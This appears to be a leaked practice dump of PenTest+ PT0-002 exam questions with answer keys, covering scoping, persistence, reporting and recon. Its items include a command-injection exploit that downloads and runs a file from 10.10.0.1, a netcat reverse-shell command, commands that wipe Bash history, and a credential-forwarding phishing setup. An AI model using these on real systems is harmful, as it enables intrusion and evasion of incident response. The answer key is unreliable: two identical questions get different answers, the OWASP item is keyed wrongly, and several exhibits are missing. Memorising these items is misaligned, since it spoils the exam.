New 2024 Realistic PT0-002 Dumps Test Engine Exam Questions in here
NEW QUESTION # 127
A customer adds a requirement to the scope of a penetration test that states activities can only occur during normal business hours. Which of the following BEST describes why this would be necessary?
- A. To ensure someone is available if something goes wrong
- B. Because of concerns regarding bandwidth limitations
- C. For testing of the customer's SLA with the ISP
- D. To meet PCI DSS testing requirements
Answer: A
NEW QUESTION # 128
A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:
* The following request was intercepted going to the network device:
GET /login HTTP/1.1
Host: 10.50.100.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
* Network management interfaces are available on the production network.
* An Nmap scan returned the following:
Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)
- A. Disable or upgrade SSH daemon.
- B. Implement a better method for authentication.
- C. Eliminate network management and control interfaces.
- D. Enforce enhanced password complexity requirements.
- E. Disable HTTP/301 redirect configuration.
- F. Create an out-of-band network for management.
Answer: E,F
NEW QUESTION # 129
A security firm is discussing the results of a penetration test with the client. Based on the findings, the client wants to focus the remaining time on a critical network segment. Which of the following BEST describes the action taking place?
- A. Maximizing the likelihood of finding vulnerabilities
- B. Eliminating the potential for false positives
- C. Reducing the risk to the client environment
- D. Reprioritizing the goals/objectives
Answer: D
Explanation:
Goal reprioritization: Have the goals of the assessment changed? Has any new information been found that might affect the goal or desired end state? I would also agree with A, because by goal reprioritization you are more likely to find vulnerabilities in this specific segment of critical network, but it is a side effect of goal reprioritization.
NEW QUESTION # 130
During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.
INSTRUCTIONS
Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Answer:
Explanation:
NEW QUESTION # 131
A penetration tester gains access to a system and is able to migrate to a user process:
Given the output above, which of the following actions is the penetration tester performing? (Choose two.)
- A. Adding an additional IP address on the compromised system
- B. Redirecting output from a file to a remote system
- C. Setting up a reverse shell from a remote system
- D. Executing a file on the remote system
- E. Creating a new process on all domain systems
- F. Mapping a share to a remote system
- G. Building a scheduled task for execution
Answer: D,F
Explanation:
WMIC.exe is a built-in Microsoft program that allows command-line access to the Windows Management Instrumentation. Using this tool, administrators can query the operating system for detailed information about installed hardware and Windows settings, run management tasks, and even execute other programs or commands.
NEW QUESTION # 132
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
exploit = "POST "
exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a"
exploit += "HTTP/1.1"
Which of the following commands should the penetration tester run post-engagement?
- A. grep -v apache ~/.bash_history > ~/.bash_history
- B. taskkill /IM "apache" /F
- C. rm -rf /tmp/apache
- D. chmod 600 /tmp/apache
Answer: C
NEW QUESTION # 133
A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?
- A. Move laterally to create a user account on LDAP
- B. Obtain /etc/shadow and brute force the root password.
- C. Create a one-shot system service to establish a reverse shell.
- D. Run the nc -e /bin/sh <...> command.
Answer: C
Explanation:
https://hosakacorp.net/p/systemd-user.html
NEW QUESTION # 134
A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?
- A. Create a one-shot systemd service to establish a reverse shell.
- B. Move laterally to create a user account on LDAP
- C. Run the nc -e /bin/sh <...> command.
- D. Obtain /etc/shadow and brute force the root password.
Answer: C
NEW QUESTION # 135
A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.)
- A. Open-source research
- B. Traffic sniffing
- C. A vulnerability scan
- D. A ping sweep
- E. Port knocking
- F. An Nmap scan
Answer: A,B
NEW QUESTION # 136
For a penetration test engagement, a security engineer decides to impersonate the IT help desk. The security engineer sends a phishing email containing an urgent request for users to change their passwords and a link to https://example.com/index.html. The engineer has designed the attack so that once the users enter the credentials, the index.html page takes the credentials and then forwards them to another server that the security engineer is controlling. Given the following information:
Which of the following lines of code should the security engineer add to make the attack successful?
- A. crossDomain: true
- B. window.location.= 'https://evilcorp.com'
- C. redirectUrl = 'https://example.com'
- D. geturlparameter ('username')
Answer: A
NEW QUESTION # 137
A penetration tester gains access to a system and establishes persistence, and then runs the following commands:
cat /dev/null > temp
touch -r .bash_history temp
mv temp .bash_history
Which of the following actions is the tester MOST likely performing?
- A. Redirecting Bash history to /dev/null
- B. Making a copy of the user's Bash history for further enumeration
- C. Covering tracks by clearing the Bash history
- D. Making decoy files on the system to confuse incident responders
Answer: C
NEW QUESTION # 138
After gaining access to a previous system, a penetration tester runs an Nmap scan against a network with the following results:
The tester then runs the following command from the previous exploited system, which fails:
Which of the following explains the reason why the command failed?
- A. An account for RDP does not exist on the server.
- B. PowerShell requires administrative privilege.
- C. The tester input the incorrect IP address.
- D. The command requires the -port 135 option.
Answer: A
NEW QUESTION # 139
Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience?
- A. Code context for instances of unsafe type-casting operations
- B. Bill of materials including supplies, subcontracts, and costs incurred during assessment
- C. Executive summary of the penetration-testing methods used
- D. Quantitative impact assessments given a successful software compromise
Answer: A
Explanation:
Code context for instances of unsafe type-casting operations would most likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience, as it would provide relevant and actionable information for the developers to fix the vulnerabilities.
Type-casting is the process of converting one data type to another, such as an integer to a string. Unsafe type-casting can lead to errors, crashes, or security issues, such as buffer overflows or code injection.
NEW QUESTION # 140
Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)
- A. Ransomware attacks
- B. Buffer overflows
- C. Zero-day attacks
- D. Injection flaws
- E. Race-condition attacks
- F. Cross-site scripting
Answer: B,F
NEW QUESTION # 141
A penetration tester receives the following results from an Nmap scan:
Which of the following OSs is the target MOST likely running?
- A. Windows Server
- B. Arch Linux
- C. CentOS
- D. Ubuntu
Answer: A